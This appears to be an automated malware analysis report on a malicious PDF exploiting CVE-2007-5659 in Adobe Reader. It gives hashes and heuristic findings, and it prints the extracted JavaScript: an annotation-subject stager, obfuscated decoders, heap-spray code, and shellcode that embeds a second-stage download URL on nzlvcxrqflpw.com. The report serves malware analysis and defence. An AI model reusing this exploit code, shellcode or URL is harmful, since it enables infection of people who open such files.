PDF malware analysis — malicious · 77b7281f88f41c24

MALICIOUS

PDF

9.4 KB

MD5: 4b35577c567e66260848242e7e4fb0b0 SHA-1: 7e99de5e843b22c36dfdb7d96d8458b7d4b6f614 SHA-256: 77b7281f88f41c2421e8d6f4daec13df5269844e1a21c04cbb10757a29b97ba4

278 Risk Score

Malware Insights

MITRE ATT&CK

T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF contains JavaScript that exploits CVE-2007-5659 by leveraging the syncAnnotScan and getAnnots functions to retrieve and decode a payload from the annotation subject. This payload is then evaluated, leading to the download of a second-stage executable from the URL http://nzlvcxrqflpw.com/nte/tuta8.php/eH2ce7e3ffV0100f060006R00000000102Td44f46fa203l000cK9ba9afb7. The ML classifier strongly indicates maliciousness.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 10

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE

PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER

PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN

PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (matched in decompressed stream)
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://nzlvcxrqflpw.com/nte/tuta8.php/eH2ce7e3ffV0100f060006R00000000102Td44f46fa203l000cK9ba9afb7 Referenced by PDF JavaScript

Extracted artifacts 5

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0007_000.js` `dc37160715dd481d0bf49e7af5079aad16ed0e66896c1ae05ca27000b3e4454e`	pdf-javascript-stream	PDF /JS object 7 at offset 0x19B	259 bytes
Preview script First 1,000 lines of the extracted script var z; var y; z = y = app.doc; y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));s = this['unes' + 'cape'] (l) ;var e = app['ev' + 'al']; e(s); s = ''; z = 1;
`generic_stage_recovery_000.js` `1f9c41bac023af5173acb947acb1765aece4fb2d478d8f77dfc696cb5d6327ed`	deobfuscated-js	generic stage recovery split-literal-normalize from JavaScript object 7 at offset 0x19B	249 bytes
Preview script First 1,000 lines of the extracted script var z; var y; z = y = app.doc; y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));s = this['unescape'] (l) ;var e = app['eval']; e(s); s = ''; z = 1;
`annotation_subject_callee_hex_stage_000.js` `ecc2960466758e3f7dd7ade56e86d0f2c8c17ec7d1092ab9c5f693ca8496d92f`	deobfuscated-js	annotation-subject callee-key decoded JavaScript at offset 0x14A	5130 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var g1_g_8Gn_EyF = new Array();var pQ_P_kSR__j38 = 0;var nB3veslY8u0_A = "";function T56_so_j8GnI8su(je_34eH_e, w_8apwA4r__h0mV){var S_J_OA_3__8_3eW = w_8apwA4r__h0mV.toString();var K237E_e_B_x = "";for(var p_oBv5sn88Q = 0; p_oBv5sn88Q < S_J_OA_3__8_3eW.length; p_oBv5sn88Q++) {var OHE_7_Yi = parseInt(S_J_OA_3__8_3eW.substr(p_oBv5sn88Q, 1));if (!isNaN(OHE_7_Yi)) {OHE_7_Yi = OHE_7_Yi.toString(16);if (OHE_7_Yi.length == 1) { OHE_7_Yi = "0" + OHE_7_Yi; }else if (OHE_7_Yi.length != 2) { OHE_7_Yi = "00"; }K237E_e_B_x = OHE_7_Yi + K237E_e_B_x;}}while(K237E_e_B_x.length < 8) { K237E_e_B_x = "0" + K237E_e_B_x; }var N_ymr8806aP6 = je_34eH_e.toString(16);if (N_ymr8806aP6.length == 1) { N_ymr8806aP6 = "0" + N_ymr8806aP6; }else if (N_ymr8806aP6.length != 2) { N_ymr8806aP6 = "00"; }K237E_e_B_x = "3" + N_ymr8806aP6 + "P" + K237E_e_B_x;return K237E_e_B_x;}function uv_M_4_a(E_2366XOR, p65of4O3_6__d){var w_k0s4 = new Array("");var pAs_aqp___pSI = E_2366XOR;var D___8EpU___7y7f;if ((D___8EpU___7y7f = E_2366XOR.lastIndexOf("%u00")) != -1) {if (D___8EpU___7y7f + 6 == E_2366XOR.length) {w_k0s4[0] = E_2366XOR.substr(D___8EpU___7y7f + 4, 2);pAs_aqp___pSI = E_2366XOR.substring(0, D___8EpU___7y7f);}}D___8EpU___7y7f = 1;for (p_oBv5sn88Q = 0; p_oBv5sn88Q < p65of4O3_6__d.length; p_oBv5sn88Q++) {var D_Mr_Ac = p65of4O3_6__d.charCodeAt(p_oBv5sn88Q).toString(16);if (D_Mr_Ac.length == 1) { D_Mr_Ac = "0" + D_Mr_Ac; }w_k0s4[D___8EpU___7y7f] = D_Mr_Ac;D___8EpU___7y7f++;}p_oBv5sn88Q = w_k0s4[0].length ? 0 : 1;w_k0s4[D___8EpU___7y7f] = "00";w_k0s4[D___8EpU___7y7f + 1] = "00";D___8EpU___7y7f += 2;if ((w_k0s4.length - p_oBv5sn88Q) % 2) {w_k0s4[D___8EpU___7y7f] = "00";}while(p_oBv5sn88Q < w_k0s4.length) {pAs_aqp___pSI += "%u" + w_k0s4[p_oBv5sn88Q + 1] + w_k0s4[p_oBv5sn88Q];p_oBv5sn88Q += 2;}pAs_aqp___pSI += "%u0000";return pAs_aqp___pSI;}function PU_2U_sV3_O__5(p_DNn_1_O__67_O, ffkjF0B_21N4){while (p_DNn_1_O__67_O.length2<ffkjF0B_21N4) {p_DNn_1_O__67_O += p_DNn_1_O__67_O;}p_DNn_1_O__67_O = p_DNn_1_O__67_O.substring(0,ffkjF0B_21N4/2);return p_DNn_1_O__67_O;}function Wt6_F8S(tdbE30oiTx___0, B__G6p15, JXi_po){var E3__gT0wS40 = 0x0c0c0c0c;var p_DNn_1_O__67_O = unescape(B__G6p15);var p65of4O3_6__d = T56_so_j8GnI8su(tdbE30oiTx___0, JXi_po);var wveN___kbPsKJ = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var E_2366XOR = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7370%u6668%u0078%u7468%u7074%u2f3a%u6e2f%u6c7a%u6376%u7278%u6671%u706c%u2e77%u6f63%u2f6d%u746e%u2f65%u7574%u6174%u2e38%u6870%u2f70%u4865%u6332%u3765%u3365%u6666%u3056%u3031%u6630%u3630%u3030%u3630%u3052%u3030%u3030%u3030%u3130%u3230%u6454%u3434%u3466%u6636%u3261%u3330%u306c%u3030%u4b63%u6239%u3961%u6661%u3762";app.Y476S46uKp = unescape(uv_M_4_a(E_2366XOR, p65of4O3_6__d));var W3682h6YqcT = 0x400000;var Wm_E5_UYQgv = wveN___kbPsKJ.length 2;var ffkjF0B_21N4 = W3682h6YqcT - (Wm_E5_UYQgv+0x38);p_DNn_1_O__67_O = PU_2U_sV3_O__5(p_DNn_1_O__67_O, ffkjF0B_21N4);var Fs7Uer8H8JJ_231 = (E3__gT0wS40 - 0x400000)/W3682h6YqcT;for (var MK_6_6f = 0; MK_6_6f < Fs7Uer8H8JJ_231; MK_6_6f++) {g1_g_8Gn_Ey ... (truncated)
`legacy_pdfkit_stage_001.js` `ef6112acff6da528d540748b52066814d3ad28291871d0e6a45f1868e17be6d1`	deobfuscated-js	repeated-marker hex decoded JavaScript at offset 0x2D4	12082 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script function mW1n__NDpT_wCS(G_2mYy2_y, b34b_Pw){var d3RK7_IjDE_1 = arguments["callee"];d3RK7_IjDE_1 = d3RK7_IjDE_1.toString();var Tl_4sCM = 0;try {if (app) {Tl_4sCM++;Tl_4sCM++;}} catch(e) { }var G150c3unNAO__0 = new Array();if (G_2mYy2_y) { G150c3unNAO__0 = G_2mYy2_y;} else {var cno_0Vs = 0;var F2o_D2cNb = 0;var tc722v18 = 512;var U___Ik = 49;U___Ik--;while(F2o_D2cNb < d3RK7_IjDE_1.length) {var XYGY2B_G1_7_d = 1;var NX70__gw2lK = d3RK7_IjDE_1.charCodeAt(F2o_D2cNb);if (NX70__gw2lK >= U___Ik && NX70__gw2lK <= (U___Ik + 9)) {if (cno_0Vs == 4) { cno_0Vs = 0; }if (isNaN(G150c3unNAO__0[cno_0Vs])) { G150c3unNAO__0[cno_0Vs] = 0; }G150c3unNAO__0[cno_0Vs] += NX70__gw2lK;if (G150c3unNAO__0[cno_0Vs] > tc722v18) {G150c3unNAO__0[cno_0Vs] -= tc722v18;}cno_0Vs++;}F2o_D2cNb++;}}cno_0Vs = 4;while (cno_0Vs > 0) {if (G150c3unNAO__0[cno_0Vs - 1] > 256) {G150c3unNAO__0[cno_0Vs - 1] -= 256;}cno_0Vs--;}var Sna_0Qs = 0;var I_T_7YST_T4 = "";var nx__uM_w = 0;var BMk_B_780 = 0;var D__1l__Q5kUH = 0;var Vw0_X0_Vpi7_8_n;var f8__Pp__rJ5D3q6 = 0;while(BMk_B_780 < b34b_Pw.length) {var xkY_N_e = b34b_Pw.substr(BMk_B_780, 1) + "J";var k_6R37e_X_1ML = parseInt(xkY_N_e, 16);if (D__1l__Q5kUH) {Vw0_X0_Vpi7_8_n += k_6R37e_X_1ML;if (Sna_0Qs == 4) {Sna_0Qs -= 4;}var vd__31 = Vw0_X0_Vpi7_8_n;vd__31 = vd__31 - (f8__Pp__rJ5D3q6 + 2) * G150c3unNAO__0[Sna_0Qs];if (vd__31 < 0) {var B0k___4_v___5 = Math.floor(vd__31 / 256);vd__31 = vd__31 - B0k___4_v___5 * 256;}vd__31 = String.fromCharCode(vd__31);if (Tl_4sCM == 1) {I_T_7YST_T4 += k_6R37e_X_1ML;} else if (Tl_4sCM == 2) {I_T_7YST_T4 += vd__31;} else {I_T_7YST_T4 += BMk_B_780;}Sna_0Qs++;f8__Pp__rJ5D3q6++;D__1l__Q5kUH = 0;} else {Vw0_X0_Vpi7_8_n = k_6R37e_X_1ML * 16;D__1l__Q5kUH = 1;}BMk_B_780++;};;var x=0; var qay_y6 = this.app;qay_y6['ev'+'al'](I_T_7YST_T4);} mW1n__NDpT_wCS(0, "C635C2695775FF84EFEC375F8F69B90BF0D1B007D57B00AE82E691BAD80DBB8BB1C6F0594123701CFB87C2F08F0EF39DF0513069ABFAC17F3062F21426C97321A90CC5B94F85C09AB0D6126C9699AE6844FDFF47905815E36FE79FE01A1CC7C3998C439E182E855CC368D5198F09ECC5477348DAE0FBA18182530F89E0D1561ECB4AB13B1097FFE7EF0331D063839F7D2FC7F570904100646FAC91312725B407AFB338995D1A4EB1FF87E4839912270DF94F861AE2A4ABBF432BF5C015C34294C8F48D291266DB43FF261827919660F52F03D2CFA5774E6548C5503ED014BBF5C0B33FEB66F993EBC86CC1716CC413841A735F3ACFB7BF2C4853E30607926CDABE3BC4B12B64107CFFF66626A39278FD21BFBBC2907F56CE82947F89F543B774A9BDF0261034812F0399B9FFA4CC13C41A735F7ACFB7BF6C4853E3460792732AB247C4FB18B4FFCCD22A25A49E5C7856FCB4C102993F4913309C51EA2332E1A378A3186E4FFB7F56F95D99F1ABF308EA2F4B6FD2D9A49D6D5F3CF580E7C3595E7E48BF1C64B6090BF7DC21A7595FA9ABF0BCDF61B563174C69DD5E2D1552E709B8740DA610F5495D0B54BF597503F744297D30F690A690AF301FD0B0F8A95F6CAF2DB94410C105490319101A964468D418D9EF90CF5D495B7CD99E68244CA0F68D7402D2103F40CCD879CF888FFD29450D343229A0A69BED8D3FE2D4E7A95FDAAF16AFC11081C06CD8F94F288F7DA9E5FBB4DBCBA33B25CC75D372A0281FFD92C7BC395555EC6BEFC36BB5F0950302C448427C9EDEEBD4753030D019D9847BD59B0683C035A305BCD21368516D446235F2B4BBF9BB3613E455D395E0F243F89070D1468A62E46E5C09A1E20968D4F606204A30B690EEC5AC432815690FC92E69BF27C43B59B207C5C1EA19AC998A606D1EF30986E23C181D46D580F7DE50E503B7C838892D01406EB954EB317E033952424C48E9A6E5B0C33031D083E08620607022AF825DB6D815C0EA5101665F6002350003BE906D464D38C28F7A1D56B80D808A31F926F28CE2FE9BE4B950C5FD45023D307490D2BF467D66E8D9E09A61C586F48D691274D03FCBD46D3C6257770A2FF9EFDBCF7C00AA30966363D00FA063AFCD3D5B28FC50F3F184A6B15BC4E2B5F2343B59BBB6934455531540F2C378F0C239C4FE62B2C0A8C2E727768F899F472F0CCB56D6794E1084DD9FEFD059F6B49DB3048851EC655CC267A60788F312D1F08446AEDFEA949C4353E6800FC82970C635C2E967A30BCD03E810AE5092A5BCF0D5028BD17D080F329D6B371156A00591C72FCA61347F9CEFA4C35A50E1E02A2F4643EFA6DCAFDF4B6A11D3D0A85F94AF0C957945A3FF3CC72D27176B8DA6A5F8BCD4B8CF63187280C98F600F1BF90CB6740DC9352352B0C66AC8A082D22C8643885967D4E9D81C761CD2C62594309779FD706A2D64CD4EB9D46B5A964468092FF3EFD1B57435CC6FD367BAE74AA040708AF0262DE4651CC267A6C788F312933C797EA0E4EC892D8B6B0F4CE0D73410803170C61089FF8FC3EA26897F766E7845F6034DE22C240C6FD368C62039DFB4AF8B496056E44B1DC460900359DF30E6437371EAE0E3BFAC ... (truncated)
`deobfuscated.js` `637927f63745573ce92d290ccbbf7ef35d1240ecd3dde90b7039a3cb0ed7a058`	deobfuscated-js	PDF JavaScript deobfuscation pass	41452 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var z; var y; z = y = app.doc; y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));s = this['unes' + 'cape'] (l) ;var e = app.eval; e(s); s = ''; z = 1; z0dz0az0dz0az09z66z75z6ez63z74z69z6fz6ez20z6dz57z31z6ez5fz5fz4ez44z70z54z5fz77z43z53z28z47z5fz32z6dz59z79z32z5fz79z2cz20z62z33z34z62z5fz50z77z29z7bz76z61z72z20z64z33z52z4bz37z5fz49z6az44z45z5fz31z20z3dz20z61z72z67z75z6dz65z6ez74z73z5bz22z63z61z6cz6cz65z65z22z5dz3bz64z33z52z4bz37z5fz49z6az44z45z5fz31z20z3dz20z64z33z52z4bz37z5fz49z6az44z45z5fz31z2ez74z6fz53z74z72z69z6ez67z28z29z3bz76z61z72z20z54z6cz5fz34z73z43z4dz20z3dz20z30z3bz74z72z79z20z7bz69z66z20z28z61z70z70z29z20z7bz54z6cz5fz34z73z43z4dz2bz2bz3bz54z6cz5fz34z73z43z4dz2bz2bz3bz7dz7dz20z63z61z74z63z68z28z65z29z20z7bz20z7dz76z61z72z20z47z31z35z30z63z33z75z6ez4ez41z4fz5fz5fz30z20z3dz20z6ez65z77z20z41z72z72z61z79z28z29z3bz69z66z20z28z47z5fz32z6dz59z79z32z5fz79z29z20z7bz20z47z31z35z30z63z33z75z6ez4ez41z4fz5fz5fz30z20z3dz20z47z5fz32z6dz59z79z32z5fz79z3bz7dz20z65z6cz73z65z20z7bz76z61z72z20z63z6ez6fz5fz30z56z73z20z3dz20z30z3bz76z61z72z20z46z32z6fz5fz44z32z63z4ez62z20z3dz20z30z3bz76z61z72z20z74z63z37z32z32z76z31z38z20z3dz20z35z31z32z3bz76z61z72z20z55z5fz5fz5fz49z6bz20z3dz20z34z39z3bz55z5fz5fz5fz49z6bz2dz2dz3bz77z68z69z6cz65z28z46z32z6fz5fz44z32z63z4ez62z20z3cz20z64z33z52z4bz37z5fz49z6az44z45z5fz31z2ez6cz65z6ez67z74z68z29z20z7bz76z61z72z20z58z59z47z59z32z42z5fz47z31z5fz37z5fz64z20z3dz20z31z3bz76z61z72z20z4ez58z37z30z5fz5fz67z77z32z6cz4bz20z3dz20z64z33z52z4bz37z5fz49z6az44z45z5fz31z2ez63z68z61z72z43z6fz64z65z41z74z28z46z32z6fz5fz44z32z63z4ez62z29z3bz69z66z20z28z4ez58z37z30z5fz5fz67z77z32z6cz4bz20z3ez3dz20z55z5fz5fz5fz49z6bz20z26z26z20z4ez58z37z30z5fz5fz67z77z32z6cz4bz20z3cz3dz20z28z55z5fz5fz5fz49z6bz20z2bz20z39z29z29z20z7bz69z66z20z28z63z6ez6fz5fz30z56z73z20z3dz3dz20z34z29z20z7bz20z63z6ez6fz5fz30z56z73z20z3dz20z30z3bz20z7dz69z66z20z28z69z73z4ez61z4ez28z47z31z35z30z63z33z75z6ez4ez41z4fz5fz5fz30z5bz63z6ez6fz5fz30z56z73z5dz29z29z20z7bz20z47z31z35z30z63z33z75z6ez4ez41z4fz5fz5fz30z5bz63z6ez6fz5fz30z56z73z5dz20z3dz20z30z3bz20z7dz47z31z35z30z63z33z75z6ez4ez41z4fz5fz5fz30z5bz63z6ez6fz5fz30z56z73z5dz20z2bz3dz20z4ez58z37z30z5fz5fz67z77z32z6cz4bz3bz69z66z20z28z47z31z35z30z63z33z75z6ez4ez41z4fz5fz5fz30z5bz63z6ez6fz5fz30z56z73z5dz20z3ez20z74z63z37z32z32z76z31z38z29z20z7bz47z31z35z30z63z33z75z6ez4ez41z4fz5fz5fz30z5bz63z6ez6fz5fz30z56z73z5dz20z2dz3dz20z74z63z37z32z32z76z31z38z3bz7dz63z6ez6fz5fz30z56z73z2bz2bz3bz7dz46z32z6fz5fz44z32z63z4ez62z2bz2bz3bz7dz7dz63z6ez6fz5fz30z56z73z20z3dz20z34z3bz77z68z69z6cz65z20z28z63z6ez6fz5fz30z56z73z20z3ez20z30z29z20z7bz69z66z20z28z47z31z35z30z63z33z75z6ez4ez41z4fz5fz5fz30z5bz63z6ez6fz5fz30z56z73z20z2dz20z31z5dz20z3ez20z32z35z36z29z20z7bz47z31z35z30z63z33z75z6ez4ez41z4fz5fz5fz30z5bz63z6ez6fz5fz30z56z73z20z2dz20z31z5dz20z2dz3dz20z32z35z36z3bz7dz63z6ez6fz5fz30z56z73z2dz2dz3bz7dz76z61z72z20z53z6ez61z5fz30z51z73z20z3dz20z30z3bz76z61z72z20z49z5fz54z5fz37z59z53z54z5fz54z34z20z3dz20z22z22z3bz76z61z72z20z6ez78z5fz5fz75z4dz5fz77z20z3dz20z30z3bz76z61z72z20z42z4dz6bz5fz42z5fz37z38z30z20z3dz20z30z3bz76z61z72z20z44z5fz5fz31z6cz5fz5fz51z35z6bz55z48z20z3dz20z30z3bz76z61z72z20z56z77z30z5fz58z30z5fz56z70z69z37z5fz38z5fz6ez3bz76z61z72z20z66z38z5fz5fz50z70z5fz5fz72z4az35z44z33z71z36z20z3dz20z30z3bz77z68z69z6cz65z28z42z4dz6bz5fz42z5fz37z38z30z20z3cz20z62z33z34z62z5fz50z77z2ez6cz65z6ez67z74z68z29z20z7bz76z61z72z20z78z6bz59z5fz4ez5fz65z20z3dz20z62z33z34z62z5fz50z77z2ez73z75z62z73z74z72z28z42z4dz6bz5fz42z5fz37z38z30z2cz20z31z29z20z2bz20z22z4az22z3bz76z61z72z20z6bz5fz36z52z33z37z65z5fz58z5fz31z4dz4cz20z3dz20z70z61z72z73z65z49z6ez74z28z78z6bz59z5fz4ez5fz65z2cz20z31z36z29z3bz69z66z20z28z44z5fz5fz31z6cz5fz5fz51z35z6bz55z48z29z20z7bz56z77z30z5fz58z30z5fz56z70z69z37z5fz38z5fz6ez20z2bz3dz20z6bz5fz36z52z33z37z65z5fz58z5fz31z4dz4cz3bz69z66z20z28z53z6ez61z5fz30z51z73z20z3dz3dz20z34z29z20z7bz53z6ez61z5fz30z51z73z20z2dz3dz20z34z3bz7dz76z61z72z20z76z64z5fz5fz33z31z20z3dz20z56z77z30z5fz58z30z5fz56z70z69z37z5fz38z5fz6ez3bz76z64z5fz5fz33z31z20z3dz20z76z ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.